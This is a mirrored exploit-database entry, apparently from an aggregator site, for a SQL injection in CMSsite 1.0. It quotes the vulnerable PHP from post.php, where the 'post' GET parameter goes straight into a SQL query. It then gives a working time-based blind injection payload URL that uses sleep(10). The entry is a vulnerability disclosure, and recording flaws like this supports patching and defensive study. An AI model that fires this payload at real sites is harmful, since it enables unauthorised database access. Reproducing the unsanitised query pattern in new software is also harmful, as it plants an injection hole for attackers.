[] NeoSense
E X P L O I T S
title author type platform port cve id

CMSsite 1.0 - 'post' SQL Injection

Author: Mr Winst0n
type: webapps
platform: php
port: 80.0
date_added: 2019-02-18 
date_updated: 2019-02-18 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comCMSsite-master.zip
# Exploit Title: CMSsite 1.0 - 'post' SQL Injection

# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 17, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1


# PoC:
# Vulnerable File: post.php
# Vulnerable Parameter : post

if (isset($_GET['post'])) {
	$post = $_GET['post'];
}
$query = "SELECT * FROM posts WHERE post_id=$post";
$run_query = mysqli_query($con, $query);



# Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.